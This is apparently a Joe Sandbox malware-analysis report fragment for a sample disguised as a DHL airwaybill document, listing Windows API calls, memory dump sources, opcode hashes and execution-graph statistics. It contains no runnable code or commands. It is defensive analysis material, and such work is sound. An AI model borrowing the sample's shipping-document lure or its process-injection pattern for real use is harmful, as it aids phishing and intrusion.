                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                APIs
                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B2B21D
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                APIs
                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B2B21D
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AF3E
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                • Instruction ID: 8b21df486d7d9e2c2402aecdf7c2aca5fbfacfc955cb9bc8c772e198487f25da
                • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                • Instruction Fuzzy Hash: EC112672504280DFCB02CF10D5D0B16BF72FB84314F24C6A9E8090B25AC33AD85ACFA2
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                • Instruction ID: f606c197ccb104877e55a478e707e8d03b81105434b64ade2572c986ed650798
                • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                • Instruction Fuzzy Hash: AC118B79904284DFDB15CF10D5C4B15FBA1FB84314F24C6A9D8494B696C37AD84ACB62
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e6a01f0744c824c064b73ded3f88a7168bf99f4a1f29bf7e49684637a9d0e659
                • Instruction ID: eec70a728bc7dee8129660213545e3aa33062acb756f594bfa8000ea29053e2e
                • Opcode Fuzzy Hash: e6a01f0744c824c064b73ded3f88a7168bf99f4a1f29bf7e49684637a9d0e659
                • Instruction Fuzzy Hash: EF01A7B1406344DAE7105B25ED94B66FFDCEF81764F148419ED0A4A286C7789C44CA72
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2e27ee91d4dffc5ef8939bba3f5de4c8be0be0873572c029279bbb04837244ea
                • Instruction ID: 3c7ad379094dd93d6b28f69e93fdf050058af38c863de84381603daeaf69172f
                • Opcode Fuzzy Hash: 2e27ee91d4dffc5ef8939bba3f5de4c8be0be0873572c029279bbb04837244ea
                • Instruction Fuzzy Hash: 2CF06271406344AEE7208A15D994B66FFDCEB91734F18C55AED094F286C3799C44CA71
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: }U%g
                • API String ID: 0-3913510682
                • Opcode ID: b95883b4976b39e965b15e62625e291cc13bc95141cc0943d3cc22b4ea50a2bd
                • Instruction ID: 3b3edf1e5ebe3c154bc60762e0798e9e6c0300ad3caaaa630c55ccc5ee8f2ca3
                • Opcode Fuzzy Hash: b95883b4976b39e965b15e62625e291cc13bc95141cc0943d3cc22b4ea50a2bd
                • Instruction Fuzzy Hash: CDE1EBB4E002698FDB14DFA9C580AAEBBF2FF89305F24C169D419AB355D7349941CFA0
                Memory Dump Source
                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c985adba307a3d3855f0d9d6090ae0e350dc579f496a370e518807d1913376c
                • Instruction ID: bea8876207ba19700ede9ce94f26fa7a410cee5cf9fa190303499833e033e8a6
                • Opcode Fuzzy Hash: 0c985adba307a3d3855f0d9d6090ae0e350dc579f496a370e518807d1913376c
                • Instruction Fuzzy Hash: 921261B2412B458EE710CF66FD4C18A7BA2FB85319B60460BD2617E2F1DBB9114ECF64
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1a7bb4ccf9f43a38e1daccd3c11472e83f884a1aceaa4cdaad002ba72ba8ded
                • Instruction ID: c971c2e1e77b4005e0c62f5b66b123aa488737a70a28dcb37a76cb576f8f792a
                • Opcode Fuzzy Hash: e1a7bb4ccf9f43a38e1daccd3c11472e83f884a1aceaa4cdaad002ba72ba8ded
                • Instruction Fuzzy Hash: AFE1FBB4E002698FDB14DFA9C580AAEBBF2FF49305F24C169D819AB355D7309941CFA1
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a08ddb31bd29fb504870e356a054301c468d8e5e8ee3f154b2ccc297e562d381
                • Instruction ID: 6adbad2c141e8978976ecda816f84514ff8e4187a62f3aa6fade641b75afb8d4
                • Opcode Fuzzy Hash: a08ddb31bd29fb504870e356a054301c468d8e5e8ee3f154b2ccc297e562d381
                • Instruction Fuzzy Hash: 75E10AB4E002598FDB14DFA9C580AAEBBF2FF89305F24C169D409AB355D731A941CFA0
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6456a658d517e0416b0cce3bae3c4077d57fe8ad5c405c5ece94596c434d7c90
                • Instruction ID: 1ed016d12ffc43f20e1889fc9b9803fa5c3ecc1f8b60c3f2fa8838544a8d97cb
                • Opcode Fuzzy Hash: 6456a658d517e0416b0cce3bae3c4077d57fe8ad5c405c5ece94596c434d7c90
                • Instruction Fuzzy Hash: 74E1FAB4E002598FDB14DFA9C580AAEBBF2FF89305F24C169D419AB355D734A941CFA0
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 406e8ce002a5c147080070e65e7fda05db4f33d1ea5ecbab343f52147a7fd4e8
                • Instruction ID: f85b8d41ba3ca62fbeba6e77ab9cc69f79fa33de6d87adb3265acce125fc0a82
                • Opcode Fuzzy Hash: 406e8ce002a5c147080070e65e7fda05db4f33d1ea5ecbab343f52147a7fd4e8
                • Instruction Fuzzy Hash: ECE1DB74E002698FDB14DFA9C580AAEBBF2FF49305F24C169D419AB355D734A941CFA0
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1e62d99f79d47f536a2463dae3c02f341014078e806ae55a2b29ab8be5c97f9
                • Instruction ID: aaceee0d7e84d3b4e90776bf66fce1e9452bdf512e43c8d7c6039ebf176983ff
                • Opcode Fuzzy Hash: d1e62d99f79d47f536a2463dae3c02f341014078e806ae55a2b29ab8be5c97f9
                • Instruction Fuzzy Hash: C1A15C32E002198FCF05DFB5C8449DEBBB2FF86300B15857AE815AB265DB71E956DB80
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f19b48c862aedb9321e675b5f44e53ee8e79898d7b1c67d840fd063cb5c8bc8
                • Instruction ID: f9ba8e848ab0cbdfb8b4c41fb01eb39540ad053a2270b49956ac89b77360014d
                • Opcode Fuzzy Hash: 2f19b48c862aedb9321e675b5f44e53ee8e79898d7b1c67d840fd063cb5c8bc8
                • Instruction Fuzzy Hash: 74D1E835D2065A8ACB01EB64D990BDDB771EFDA300F10C7AAE5593B610EB706AC5CF81
                Memory Dump Source
                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d132cab10967d319ed2f1e7be21dbfc97129f139b2c67d8bf26c539097bda85
                • Instruction ID: c63ade3cec5ec83f618f3921f1c6eb84c7c817babc31b0a486269b8252a07cf6
                • Opcode Fuzzy Hash: 8d132cab10967d319ed2f1e7be21dbfc97129f139b2c67d8bf26c539097bda85
                • Instruction Fuzzy Hash: 57D1E4B2812B458ED710CF6AFC4818A7BB2EB86315B65460BD1617F2F1DBB8144ECF64
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 85aff5f0fee9d5c1f1f86866afc81d6da1de391b595c229b680417be74858b40
                • Instruction ID: d998210bed37b6dfb184dc6b488bed3a46f054d3529257672bef6d2019a4b0e8
                • Opcode Fuzzy Hash: 85aff5f0fee9d5c1f1f86866afc81d6da1de391b595c229b680417be74858b40
                • Instruction Fuzzy Hash: 6B512C74E002198BDB14CFA9D580AAEFBF2FF89305F24C169D418AB355D7349942CFA1
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d454d5fe21b7752ed4c3c5ccbfae7f4b104a5952c0f681ee8131bc97babfadb3
                • Instruction ID: 9cf0c634d64fc44ebfe4b3959c4cedfd6f247ff88df369d3b03a23ce754fe731
                • Opcode Fuzzy Hash: d454d5fe21b7752ed4c3c5ccbfae7f4b104a5952c0f681ee8131bc97babfadb3
                • Instruction Fuzzy Hash: C351FAB0E002298FDB14DFA9C5809AEBBF2FF89305F24C1A9D418AB355D7359941CFA1
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3af6518e25f3ede6720ff7c517bdbcdc190c46096c25c2c9f9d2df6c0835282
                • Instruction ID: 78fcd2fcf36c24c7e599a42f10c85cb10f31f7b395da7b58816a29b43f07d2c4
                • Opcode Fuzzy Hash: c3af6518e25f3ede6720ff7c517bdbcdc190c46096c25c2c9f9d2df6c0835282
                • Instruction Fuzzy Hash: 53511C71E102198BDB14DFA9C580AAEFBF2FF89305F24C169D418AB355D7359942CFA0

                Execution Graph

                Execution Coverage:1.3%
                Dynamic/Decrypted Code Coverage:4.9%
                Signature Coverage:7.7%
                Total number of Nodes:143
                Total number of Limit Nodes:8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 69 417533-41754f 70 417557-41755c 69->70 71 417552 call 42f0b3 69->71 72 417562-417570 call 42f6b3 70->72 73 41755e-417561 70->73 71->70 76 417580-417591 call 42da33 72->76 77 417572-41757d call 42f953 72->77 82 417593-4175a7 LdrLoadDll 76->82 83 4175aa-4175ad 76->83 77->76 82->83
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175A5
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction ID: 1ec0bed434553549db5c626065e3c79ad4c6ac2a6111f91c4d8a9dbfaf4de485
                • Opcode Fuzzy Hash: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction Fuzzy Hash: CA0171B2E0420DBBDF10DBE1DC42FDEB7789B54308F4081AAE90897241F635EB488B95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 94 42c2e3-42c31c call 404893 call 42d523 NtClose
                APIs
                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C317
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction ID: 1839010a0fb26ebc2b48a4b82397d3f65e66571f39a56f5f23fe68b823110568
                • Opcode Fuzzy Hash: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction Fuzzy Hash: F9E08676640615BBD610FA5ADC41F97776CDFC5714F41442AFA0867242C670B90487F4

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 108 1b42b60-1b42b6c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a2104f661ec30f26174805a10698cec79dd387087777ec002c2e8b0aba6664cb
                • Instruction ID: 860f7589fcfa175ec6554bd67d634d95fe92c3d28debbd688f015f4c0eb6253c
                • Opcode Fuzzy Hash: a2104f661ec30f26174805a10698cec79dd387087777ec002c2e8b0aba6664cb
                • Instruction Fuzzy Hash: CC90026220240003424972594414716400A97E0201B55C061F5014591DC62589916625

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 110 1b42df0-1b42dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: e2ff1aaf3edc822f418746fc57ad94045a6838bcccb6476b21ea2a5006bb924b
                • Instruction ID: 45fa7125a4557ee10c7df41e01943bbb7155c0b51057176f221b0715ef120698
                • Opcode Fuzzy Hash: e2ff1aaf3edc822f418746fc57ad94045a6838bcccb6476b21ea2a5006bb924b
                • Instruction Fuzzy Hash: 2490023220140413D25572594504707000997D0241F95C452B4424559DD7568A52A621

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 109 1b42c70-1b42c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0374cf7751873a985837d6e6f3ed70bb64b8c58d855650dac6ce2e7c48ac0f84
                • Instruction ID: 32540bf5ed79f0c7fc1e98405e88caff6ab04efdc65e1c4034dc266f44c72ff6
                • Opcode Fuzzy Hash: 0374cf7751873a985837d6e6f3ed70bb64b8c58d855650dac6ce2e7c48ac0f84
                • Instruction Fuzzy Hash: C090023220148802D2547259840474A000597D0301F59C451B8424659DC79589917621

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 111 1b435c0-1b435cc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: daa870492c28b1da8612d95262e12a5aa2f70122b5e4ce3e12cb7961e9020a7f
                • Instruction ID: b437bb11a05122b8bc7e6fd701395ead23cce45fb2c48d2052129b062ad14a9f
                • Opcode Fuzzy Hash: daa870492c28b1da8612d95262e12a5aa2f70122b5e4ce3e12cb7961e9020a7f
                • Instruction Fuzzy Hash: C790023260550402D24472594514706100597D0201F65C451B4424569DC7958A516AA2

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00413E20
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8$8
                • API String ID: 1836367815-3311450054
                • Opcode ID: 87aa12d475b46fc3ff8fd7bd31b88656a3ce5379dd721831d59135c5ee513f13
                • Instruction ID: 0d0eda9b9005393d4cfcb9d556079f3e780f2d68baffe0cc6929e9a00667b133
                • Opcode Fuzzy Hash: 87aa12d475b46fc3ff8fd7bd31b88656a3ce5379dd721831d59135c5ee513f13
                • Instruction Fuzzy Hash: D2115631E40358B6D721AAA19C42FDE7F789F81B04F54805AFA047F282D2B85B078BA4

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00413E20
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 4211a35ea987d77079a32a73b8da01596c42a388fdaf48e8b746cfec4d63ddd4
                • Instruction ID: b33a30b9aef8fce91ad93595bc5e37a1282d957a91f1d26894ed66279e5e56a2
                • Opcode Fuzzy Hash: 4211a35ea987d77079a32a73b8da01596c42a388fdaf48e8b746cfec4d63ddd4
                • Instruction Fuzzy Hash: 9F11CE31E40358B6DB10DE95EC42FEEB77C9F81711F00409AFE04BB281C67857068B94

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00413E20
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 8955294706800a699e96044b983d8c756050aa2286601525f533c1dce081a2ca
                • Instruction ID: ff93d9918aec8d798fd99780e109dc6153eb3e198b7779d86bf62f830ac42494
                • Opcode Fuzzy Hash: 8955294706800a699e96044b983d8c756050aa2286601525f533c1dce081a2ca
                • Instruction Fuzzy Hash: 3E01D671E4135876EB11A6919C42FDF7B7C8F80B54F448059FA047B281D6BC67068BE5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 89 42c653-42c697 call 404893 call 42d523 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFEBCBD,00000007,00000000,00000004,00000000,00416DB1,000000F4), ref: 0042C692
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction ID: 283ad2e51c10a8fba1405b27d84f9dffca4c672f90b270f2d50781baacc0cdee
                • Opcode Fuzzy Hash: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction Fuzzy Hash: B1E06DB26043487BDA10EE99EC45EDB33ACDFC9714F404429FA08A7242CA70B95486B8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 84 42c603-42c647 call 404893 call 42d523 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(?,0041E32E,?,?,00000000,?,0041E32E,?,?,?), ref: 0042C642
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction ID: 4d465abb88dc65225f4144119b09d46a9def010d1789c6cee838552ffb039cb3
                • Opcode Fuzzy Hash: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction Fuzzy Hash: 94E092B26003047BD610EE99EC45F9B73ACDFC8714F008429FE08A7242C670BD148BB8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 99 42c6a3-42c6df call 404893 call 42d523 ExitProcess
                APIs
                • ExitProcess.KERNEL32(?,00000000,00000000,?,59AFE850,?,?,59AFE850), ref: 0042C6DA
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
